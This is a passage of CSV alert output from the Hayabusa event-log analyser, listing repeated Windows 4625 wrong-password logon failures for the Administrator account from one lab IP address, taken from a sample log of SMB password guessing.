NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.268 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rcxQVtjMqnE1wGfr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.321 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fSRggYsSiJGsGSyV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.374 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yQqfSKOyKLSILPrQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.552 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k7oAI2q6YCu8btlK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.610 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KniVwndqE9aC6cIM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.657 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: FgQbvpfuS11matJi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.702 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: R9TwJS4B9ZaDD2Ze | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.749 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IPUuoopOnwlTjlTP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.806 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9VEyOUuiOi8Q3JBJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.862 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pGGGazMTBBfrppDZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.919 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NKO4V35Y2qPEB59W | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:51:53.964 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WxVdhpR7ZnAluurU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.016 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gZjAZb9bQKZjwL8u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.066 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aKyLX5ChpgBuFEbr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.112 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 49t2xJvH2yHcyHle | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.168 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sg9Z6Pyix2UkMolr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.210 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0NN2olYn97ZoYCja | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.249 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: S98j54bDGsz0k6g9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.284 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XxFEw9s0nnEQGzUN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.342 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wSswFHFSlqcQd47k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.385 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7icutlVIWSLZJszQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.440 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DSwyugYn0n3i5f25 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.473 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: RmBaLCUcR7TmixTy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.524 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1oOBz2NQSCdTwa7V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.582 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O4tU1LPF5DRW9Vm0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.633 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SRsSNqPYruWBzp2n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.684 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3JZhBLzt4af1VtCU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.729 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dFLZIKSDBvBaWq59 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:51:54.774 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: guAG4ZTFMjZAxp1A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.817 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Yd04xsSIdiczICeG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.865 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Cx3i1URKPhC6KWI7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.914 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Npc6IS27HsWP3JA9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.963 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KIBnr0eZ1bHHGokW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.013 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6gTTrUVjpPU80LlC | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.078 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FZlmUbCNAJga24JH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.136 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Zf3aSGBMe97VujaH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.184 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8bx7ZM77aDG7y6Lh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.220 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BnHHAClMwyqA3TTI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.260 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 00ibRrYvnFt5w9X0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.300 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: VglTKbnLVFvHZHzQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.358 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3NwX0sDFwHQG7Tkq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.413 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3mMx3M1zurKMBzyj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.468 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sH7b8P0O0uea3PlN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.530 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TJcrTyBPuX0TcvOT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.574 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kwuZIQAL3BmJnPsJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:51:55.620 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lxgAfsnH6YWLRD0a | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.680 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ttBOjzmEBjr9W2QW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.732 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FPDKGGYkJQeWgtUf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.848 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nSoJWqS6YPbpCiBf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.887 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Pr2oMzxv7pcDfsgw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.940 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jiopmZAMpwg3dEaA | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.989 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tG1Bxm0lt3vwoO5V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.043 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9Kf5AaQX7KOVAIAN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.097 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FW9nBirBTHIXIrfp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.148 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: S9qKcDhfcf2kMk00 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.184 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9NgStzf2xQ4P7q0d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.225 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: j9mCrjQykX06IcMf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.256 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7S0QccvEhetekdDP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.298 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n1OnibuatFHwDeLz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.342 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O8u26bKzFOw12m0T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.380 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WEEtOj6BOkI7MPY1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.420 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EiCpuqll36DojD3e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:51:56.469 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p9zjo9ZsSVLZcrsr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.530 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KKDD0O5flEsIEDRZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.582 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jdPMREVdBEJ50ELC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.626 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p7YwRYYCnsr2v08C | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.677 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nWyAzzpmxUm2CXE9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.724 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9RNqhxyUBjUIic0n | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.774 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1JERyz3mOBZt2jki | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.817 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V0i93RW5AOsIKKMU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.875 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U3XEu06vE68O900O | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.925 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0fxeGE2jXOnoJttj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.969 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6Wdg3l6IFHTdh09j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.028 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
